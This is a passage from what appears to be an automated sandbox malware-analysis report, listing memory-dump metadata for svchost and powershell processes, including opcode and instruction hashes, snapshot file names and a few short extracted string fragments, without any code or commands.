                                                      • Opcode Fuzzy Hash: 14087ddb125aa51965361be27c78d60a5c6d692011be9224224a3d44a6244872
                                                      • Instruction Fuzzy Hash: FE22E3B1B2DA1A5FE799FF38C4692B87AD6EF98300F5405B9E40DC3287DD28AD018741
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1713735926.00007FFB4AD10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD10000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ffb4ad10000_svchost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 9O_^
                                                      • API String ID: 0-1716625314
                                                      • Opcode ID: e65b413a6a4ebf9f9ce3e042cbe0d16ff6eedab7d46d98edd7543726ca04e7e1
                                                      • Instruction ID: 3e61c1dbd67afe0d48a440220b63ee49ecd39ce37899a56c0efd9f95768c40b5
                                                      • Opcode Fuzzy Hash: e65b413a6a4ebf9f9ce3e042cbe0d16ff6eedab7d46d98edd7543726ca04e7e1
                                                      • Instruction Fuzzy Hash: 5E6125B6B0D626DAE742BF7CE0412FC3BA5EF84325B1445B6C909DB187CD24689687A0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1713735926.00007FFB4AD10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD10000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ffb4ad10000_svchost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 4O_^
                                                      • API String ID: 0-2486912895
                                                      • Opcode ID: 119079f50bff71dd2815ae6677b32ae94fdc06c4f6d9c8a9591358e977e1c6d0
                                                      • Instruction ID: 00ca78753d7b8b29496ca527bc3271a80c00f922b42df2e1a9203e3721dfeea2
                                                      • Opcode Fuzzy Hash: 119079f50bff71dd2815ae6677b32ae94fdc06c4f6d9c8a9591358e977e1c6d0
                                                      • Instruction Fuzzy Hash: 9D414CB1B1DA5A4FE396BB3CD4562B93BD6DF85221B1840FAE48DC7293DC189C438391
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1713735926.00007FFB4AD10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD10000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ffb4ad10000_svchost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: <O_^
                                                      • API String ID: 0-1368354704
                                                      • Opcode ID: a91304ab806ebbbcadf0509e6bd6f82ae42d93f06dfff547ac18eef615d05186
                                                      • Instruction ID: bd7816c9d31724d02e411ff3c7f85dff64e22592716e5d0a5d8a8c765c1ed1b2
                                                      • Opcode Fuzzy Hash: a91304ab806ebbbcadf0509e6bd6f82ae42d93f06dfff547ac18eef615d05186
                                                      • Instruction Fuzzy Hash: F74112B6A0E7559FD342FF7CE0A41E83FA0FF84214B4481F6D948DB29BCD245A568760
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1713735926.00007FFB4AD10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD10000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ffb4ad10000_svchost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: ba45565e1aa0a56e83a3e9ea387812b56689933088d7dcf0ddb91de1bfed0d06
                                                      • Instruction ID: 9f3909ca4d0ff0f1fd2e45ad1f0f153655b16ebee1806f6386d48010bfcc98d1
                                                      • Opcode Fuzzy Hash: ba45565e1aa0a56e83a3e9ea387812b56689933088d7dcf0ddb91de1bfed0d06
                                                      • Instruction Fuzzy Hash: A3A1547AB08A26DAD701BF7CF4412E93BA4EFC5331B0445B7C649DB187C924689B87E0
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1713735926.00007FFB4AD10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD10000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ffb4ad10000_svchost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 31cfd349e4c52d5664ddb84fee271a09835a00a57d29ae46eedf78240d9e0bb1
                                                      • Instruction ID: 40e87707f1500c66cecfeee63b0d7a965736d40dd2092ea87d7c6256b638abf2
                                                      • Opcode Fuzzy Hash: 31cfd349e4c52d5664ddb84fee271a09835a00a57d29ae46eedf78240d9e0bb1
                                                      • Instruction Fuzzy Hash: DB91377AB08A26DAD701BF7DF4052E93BA4EFC4331B1485B7C549DB187C924689B87E0
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1713735926.00007FFB4AD10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD10000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ffb4ad10000_svchost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 764918b42537f518ea726f3b1adfaf053301f177f0a134003729f6d6d68de3e7
                                                      • Instruction ID: 6d4306089e0e7d1f912ccc41bddfea4af07d1aecb0b8bc1205cf6c2a61233e57
                                                      • Opcode Fuzzy Hash: 764918b42537f518ea726f3b1adfaf053301f177f0a134003729f6d6d68de3e7
                                                      • Instruction Fuzzy Hash: 0181677AB08A26DAD701BF7CF4052E93BA5EFC4331B1485B7C549DB187C924689B87E0
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1713735926.00007FFB4AD10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD10000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ffb4ad10000_svchost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 5fcfa336c1189146b0da511bcba94fabe37a5fe6c9f8442c5d92c2c3aafdffca
                                                      • Instruction ID: 3e667a0f58bc20583590f38da219c9d5fd60458a1a4adc5571bc1b552272e9f9
                                                      • Opcode Fuzzy Hash: 5fcfa336c1189146b0da511bcba94fabe37a5fe6c9f8442c5d92c2c3aafdffca
                                                      • Instruction Fuzzy Hash: 4881577AB08A26DAD701BF7CF4052E93BA5EFC4331B1485B7C549DB187C924689B87E0
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1713735926.00007FFB4AD10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD10000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ffb4ad10000_svchost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0537d99155357f73b7bb11316831816fcfa1df36d145997ac81e3dc3d60fda45
                                                      • Instruction ID: 830e33523eb8b1d7afb917bcadfc7225b2952745a002251c6f639e0bd5037f88
                                                      • Opcode Fuzzy Hash: 0537d99155357f73b7bb11316831816fcfa1df36d145997ac81e3dc3d60fda45
                                                      • Instruction Fuzzy Hash: C271667AB08A26DAD701BF7CF4052E93BA5EFC4331B1445B6C549DB187C924689BC7E0
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1713735926.00007FFB4AD10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD10000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ffb4ad10000_svchost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6d51ce8223ee23ec3cf251ff2b24b09b6f7c03d91d3a39dba8e67ac579eb47ec
                                                      • Instruction ID: 2c0cee7c33f4fe33d1719a1ab535ba86acdd394b4a3d090acf7e72e506a581cd
                                                      • Opcode Fuzzy Hash: 6d51ce8223ee23ec3cf251ff2b24b09b6f7c03d91d3a39dba8e67ac579eb47ec
                                                      • Instruction Fuzzy Hash: 67515AB2A0E7859FD342BF7CE4601E83FA0FF9120475441F6D488DB28BDD245A5687A1
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1713735926.00007FFB4AD10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD10000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ffb4ad10000_svchost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: db18221cb500df0691e6f3b6586ab00c624825e38b6929bf146e590d8cef1bf6
                                                      • Instruction ID: dd678df9ed59fe99a5346cad1d5375b97e6e3c1e2cfd3963be6c842ebac714a5
                                                      • Opcode Fuzzy Hash: db18221cb500df0691e6f3b6586ab00c624825e38b6929bf146e590d8cef1bf6
                                                      • Instruction Fuzzy Hash: 4831E361B1CA490FE789FB7C945A378AAC2EBD8315F0401BEE84EC72D3DD289C468345
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1713735926.00007FFB4AD10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD10000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ffb4ad10000_svchost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a676941c3bf1a3b6fddf4fdfd472e595474f6d35275e8c119f244475cadb9ece
                                                      • Instruction ID: 65e006244ae81163af1b152e20e072863ce756e4ad61866b446f3301c6c0363e
                                                      • Opcode Fuzzy Hash: a676941c3bf1a3b6fddf4fdfd472e595474f6d35275e8c119f244475cadb9ece
                                                      • Instruction Fuzzy Hash: 9831D161B1CA480FE789FB3C945A379AAC6EBD8315F1401BEE44EC7693DE289C468345
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1713735926.00007FFB4AD10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD10000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ffb4ad10000_svchost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a7252f960fadd156818595d08443e4c69bbca07839dc5891f6c94bfde8fe3c6e
                                                      • Instruction ID: 1f467c8da8728a55d429250e993f555db7049a20394b94c233c8a836fe2aa66a
                                                      • Opcode Fuzzy Hash: a7252f960fadd156818595d08443e4c69bbca07839dc5891f6c94bfde8fe3c6e
                                                      • Instruction Fuzzy Hash: DA4112B1A0DA1A9FE745FF78D4552F87FB2FF98200B5444F5D408E7287CD28A85687A0
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1713735926.00007FFB4AD10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD10000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ffb4ad10000_svchost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a6f6c52642b8698453c163e52fd06f11cfc2a9b8df8eae2455f377f9bfc30756
                                                      • Instruction ID: 108022121086432e5341fc45c993b12a0c6c85b0844fe90b0e8f58f70f9b0e6e
                                                      • Opcode Fuzzy Hash: a6f6c52642b8698453c163e52fd06f11cfc2a9b8df8eae2455f377f9bfc30756
                                                      • Instruction Fuzzy Hash: DF3128A1B1CE4A5FF745BFBC981A3BC66D6EF98301F1401BAE40DD3686DC18AC458391
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1713735926.00007FFB4AD10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD10000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ffb4ad10000_svchost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: be096ba9e1ac35224e31e5c37849eca2e493c3aef864d1c25de221a0ec043d1c
                                                      • Instruction ID: a8784b7f436c7351bc1f91e70a03ddf664ff95af4d0c372b626b674217059302
                                                      • Opcode Fuzzy Hash: be096ba9e1ac35224e31e5c37849eca2e493c3aef864d1c25de221a0ec043d1c
                                                      • Instruction Fuzzy Hash: ED31A4B0A18A1D8FEB45FFB8D4656FD7BA2FF98300F5045B4D009E3286CD38A9558750
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1713735926.00007FFB4AD10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD10000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ffb4ad10000_svchost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3e6eba37c3257f6c1f03cbe6b80476705aad1cdccb68f4a08431311651ed2d0f
                                                      • Instruction ID: e70d6a7810a49d19f58d892617e1bd05c23d495615557872221df92d4ef653cd
                                                      • Opcode Fuzzy Hash: 3e6eba37c3257f6c1f03cbe6b80476705aad1cdccb68f4a08431311651ed2d0f
                                                      • Instruction Fuzzy Hash: D821C3B164AB499FD352FF38E0A41E97F71FF98200B8045E5D948D338ACD345E218761
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1713735926.00007FFB4AD10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD10000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ffb4ad10000_svchost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f4305bb56e89997d07490d767dc41dbc28b9d0771aeed705f02cae3c1266859c
                                                      • Instruction ID: 057633b42be4b5a8dd8177cd058c677c3b237f2c5fb45dd1b24189e9254e7517
                                                      • Opcode Fuzzy Hash: f4305bb56e89997d07490d767dc41dbc28b9d0771aeed705f02cae3c1266859c
                                                      • Instruction Fuzzy Hash: 700149B5A0DBC50FE785BF3899654357FE0DF91240B1804FAE8C8CA1D7DC195A818342
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1713735926.00007FFB4AD10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD10000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ffb4ad10000_svchost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 90f91038b6b7f418d6be664dcf98ad97dde5abfc9d03fa1fb755579f6f657ab5
                                                      • Instruction ID: 1c52ffb7c76b57894b15069aa875c9ef68e7f2e43536f25a258b98e9faea88c1
                                                      • Opcode Fuzzy Hash: 90f91038b6b7f418d6be664dcf98ad97dde5abfc9d03fa1fb755579f6f657ab5
                                                      • Instruction Fuzzy Hash: BDF059B3B1CD4E0BE780BEB8C8141FD7BA2FBC8340F8404B8E018E21C2DD2819044380
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.1789980826.00007FFB4AE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE10000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ffb4ae10000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: (7bM
                                                      • API String ID: 0-977313744
                                                      • Opcode ID: a33ff345e545ab6ddbd3ceb8e536c9e872542a34ea219c3d531f4b123f54e319
                                                      • Instruction ID: 60c1bba2b6b8e1420bd835de8c23c23c257501c50201c0f69f4dc8a8dad1e5b4
                                                      • Opcode Fuzzy Hash: a33ff345e545ab6ddbd3ceb8e536c9e872542a34ea219c3d531f4b123f54e319
                                                      • Instruction Fuzzy Hash: 881205F2A4D79A0FE356BF3898651B43FE5EF56210B2901FBD099C7293D9189C068392
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.1789980826.00007FFB4AE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE10000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ffb4ae10000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: X7bM
                                                      • API String ID: 0-1367293772
                                                      • Opcode ID: 74e8f6ff45fcccfc2154bd14022809c2bca91b651866abc515c0b760679860f8
                                                      • Instruction ID: ac19d9160530d29a7c764bd193f82ac08672ddf3ebd4136b9176c99f81e2f1f8
                                                      • Opcode Fuzzy Hash: 74e8f6ff45fcccfc2154bd14022809c2bca91b651866abc515c0b760679860f8
                                                      • Instruction Fuzzy Hash: 20D113B290EB998FE766BF7888651B57FE5FF15210B2800FAD49CCB093DA189C06C351
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.1789399629.00007FFB4AD40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD40000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ffb4ad40000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 97fbfb2bb857eaac080f96d95878654fa666e04d8030447e2dc7ffa33189eba1
                                                      • Instruction ID: b92ca53cb47eaf70b04c54a8b041f8f08ae24e4697c0efdab52cb6db217706ad
                                                      • Opcode Fuzzy Hash: 97fbfb2bb857eaac080f96d95878654fa666e04d8030447e2dc7ffa33189eba1
                                                      • Instruction Fuzzy Hash: B6712CF3D0DAA65FE742BF7CD8A60D47F68FF51228B4842F2C8C89E097EC15191646A1
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.1788777954.00007FFB4AC2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AC2D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ffb4ac2d000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7f9fc0b07dcdb88fca0d9e931e19cb044b4ca53b176690944c5cb14b93ceef76
                                                      • Instruction ID: 4470f420af7a8255c40247a9899ea8d578466b7e2164c2f7f09a15df2fedee24
                                                      • Opcode Fuzzy Hash: 7f9fc0b07dcdb88fca0d9e931e19cb044b4ca53b176690944c5cb14b93ceef76
                                                      • Instruction Fuzzy Hash: 164112B180DB848FE796DF3CDC559523FA4EF56325B2901EFD088CB1A3D625A806C792
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.1789399629.00007FFB4AD40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD40000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ffb4ad40000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a58fbdf445a431d21341481399db8a62cdc706cae2942fa1d5e7ab7ba51ec030
                                                      • Instruction ID: f032ac775bc8841fcaaed9d9b244cda25ece0d095a657ec530ecdb55da0c256e
                                                      • Opcode Fuzzy Hash: a58fbdf445a431d21341481399db8a62cdc706cae2942fa1d5e7ab7ba51ec030
                                                      • Instruction Fuzzy Hash: 8831087191CB4C9FDB18DF5CD8066A97BE4FBA9310F00426FE449D3251DA30A856CBC2
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.1789399629.00007FFB4AD40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD40000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ffb4ad40000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 19264dd6e826779fa2932795c1c83f4b6239f13c0d1e3e20bac2255d82df8c11
                                                      • Instruction ID: 093b3169de6b10434ddc85e3289ba34a5334aa8ea03913dafdaba2844823c8e6
                                                      • Opcode Fuzzy Hash: 19264dd6e826779fa2932795c1c83f4b6239f13c0d1e3e20bac2255d82df8c11
                                                      • Instruction Fuzzy Hash: 41214B7190C74C4FDB19DFACD84A7E97FE4EB96320F04426BD048C3152DA74A41ACB91
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.1789980826.00007FFB4AE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE10000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ffb4ae10000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 5488cc0c886ddeb2a0fc8bcb07968b08d69bbd8074fddc849bdcaf2364d346d5
                                                      • Instruction ID: 45bb1a7fa4da467493eab32ecf03acb10207e681cad4547433748e4b6193dd57
                                                      • Opcode Fuzzy Hash: 5488cc0c886ddeb2a0fc8bcb07968b08d69bbd8074fddc849bdcaf2364d346d5
                                                      • Instruction Fuzzy Hash: 681120F2A5E66A4FE3A8FE38D4944B83AD4FF4022076800F6E06DC7292D918AC008391
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.1789399629.00007FFB4AD40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD40000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ffb4ad40000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                      • Instruction ID: 48fcc02f775cddf632b69523a5b402d5c4ac8cef37633788f9de53dd99f768bb
                                                      • Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                      • Instruction Fuzzy Hash: 3C01677111CB0C8FD744EF0CE451AA5B7E0FB95364F10056EE58AC3655DA36E892CB45
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.1789980826.00007FFB4AE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE10000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ffb4ae10000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 33a3be56952c984f818ef57dc656c143b0d966c9bf84e9a225dd23aa7b630536
                                                      • Instruction ID: 01b194689d7e6475fcef19cf33453f9ef62827f76c55ecdf2c51667a3b91b84d
                                                      • Opcode Fuzzy Hash: 33a3be56952c984f818ef57dc656c143b0d966c9bf84e9a225dd23aa7b630536
                                                      • Instruction Fuzzy Hash: 18F0C2B2A8C5858FD355FF6CE4004B47BE4FF5532072900FAD05DC7153CA26AC858740
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.1789399629.00007FFB4AD40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD40000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ffb4ad40000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: K_^4$K_^7$K_^F$K_^J
                                                      • API String ID: 0-377281160
                                                      • Opcode ID: 2bd6d2f2dd05163922811fc3a4b7816dac4a558a94fc340b39088219714e54f0
                                                      • Instruction ID: d8ec5813aa89af2d1eae24653abc4e8cf4a2f7f3aae59695bc8ddf21f33f48bc
                                                      • Opcode Fuzzy Hash: 2bd6d2f2dd05163922811fc3a4b7816dac4a558a94fc340b39088219714e54f0
                                                      • Instruction Fuzzy Hash: E62143B7609226EED7423F7CF8045E93BA8CF9827434582F3D499DB003E814B5878AE0
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.1927188448.00007FFB4AE00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE00000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_7ffb4ae00000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4701a02999c9a8aa3e9d1e113f9e815928f98c4f2197b1e67cf30df4131ec0c8
                                                      • Instruction ID: 3fb4bf6021002110363f557561d78c558864b2347af389f3357b76e14d76d35a
                                                      • Opcode Fuzzy Hash: 4701a02999c9a8aa3e9d1e113f9e815928f98c4f2197b1e67cf30df4131ec0c8
                                                      • Instruction Fuzzy Hash: F9D168B290DB998FE755BF7888552B67FE5FF15210B2800FED49CEB083DA589805C351
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.1927188448.00007FFB4AE00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE00000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_7ffb4ae00000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8586e3f8d1df0475f0748380af0a61aa3dbe53db4ece670f73d1990265e64886
                                                      • Instruction ID: 73231ac224de94ad0e3c5e8f5d223ffa44f98dd66c7ecad7a4ca9638287844d2
                                                      • Opcode Fuzzy Hash: 8586e3f8d1df0475f0748380af0a61aa3dbe53db4ece670f73d1990265e64886
                                                      • Instruction Fuzzy Hash: 5FC127A294E7D50FE356BF3889651A47FE4EF56220B2901FBD099DB0D3D918AC0AC352
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.1927188448.00007FFB4AE00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE00000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_7ffb4ae00000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: af29ab3d69dff47e91c71db4af272a18edce205edee867dd375effed54d663d0
                                                      • Instruction ID: 55a12010f7d5ede4bcd52c2dbbdac1027fe4417f18e08c9cac6fb77996c08842
                                                      • Opcode Fuzzy Hash: af29ab3d69dff47e91c71db4af272a18edce205edee867dd375effed54d663d0
                                                      • Instruction Fuzzy Hash: C6B126A2A4DB964FE356BE3C8A251743FD5FF56210B2801FBD09DD7193DD18AC068392
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.1926441550.00007FFB4AD30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_7ffb4ad30000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e34710c2be105d2bc41287f13a4e1268eb7ec178f70aa2d07e814e305f5cdbb7
                                                      • Instruction ID: d665c3bb66c8ca39e833a3f5ea283d3c24164ad6299c96e6157d6d533fff4186
                                                      • Opcode Fuzzy Hash: e34710c2be105d2bc41287f13a4e1268eb7ec178f70aa2d07e814e305f5cdbb7
                                                      • Instruction Fuzzy Hash: 6341067190CB884FDB09EF6C9C1A6B97FE1FB55310F0441AFE48993292CA64AC55CBC6
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.1925552526.00007FFB4AC1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AC1D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_7ffb4ac1d000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 238dafa02c68837961a44da682d89057b0f3af52d2b540f2f7242c9c08eb96b1
                                                      • Instruction ID: d67ab7878da638c1bf014813b91b59f3583b282a296543aa9b1a48700fa54bae
                                                      • Opcode Fuzzy Hash: 238dafa02c68837961a44da682d89057b0f3af52d2b540f2f7242c9c08eb96b1
                                                      • Instruction Fuzzy Hash: C141E57150DBC48FD796DF389C559623FF0EF52220B1502DFD089CB5A3DA24A846CBA2
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.1926441550.00007FFB4AD30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_7ffb4ad30000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b97d55948ba1e7b50f25fe8bd301189ef6094a8c2f2a03ee15ef70d1c617f6b5
                                                      • Instruction ID: 00269513eea3efa76321a47259694d5619e46065fc4888b9e3a5ccdffe642434
                                                      • Opcode Fuzzy Hash: b97d55948ba1e7b50f25fe8bd301189ef6094a8c2f2a03ee15ef70d1c617f6b5
                                                      • Instruction Fuzzy Hash: 8621397190C74C4FDB59EF6CD84A7E97FE0EB96320F0441ABD448C3152D674A816CB91
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.1927188448.00007FFB4AE00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE00000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_7ffb4ae00000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6210112a0e9b8d93647775d58b30a443dfda4924357ac37a18879c8537521581
                                                      • Instruction ID: de4d7551fb8b7cb7adf0c4f1f675edb421a87a7d818b4333a24ff3f52adf7338
                                                      • Opcode Fuzzy Hash: 6210112a0e9b8d93647775d58b30a443dfda4924357ac37a18879c8537521581
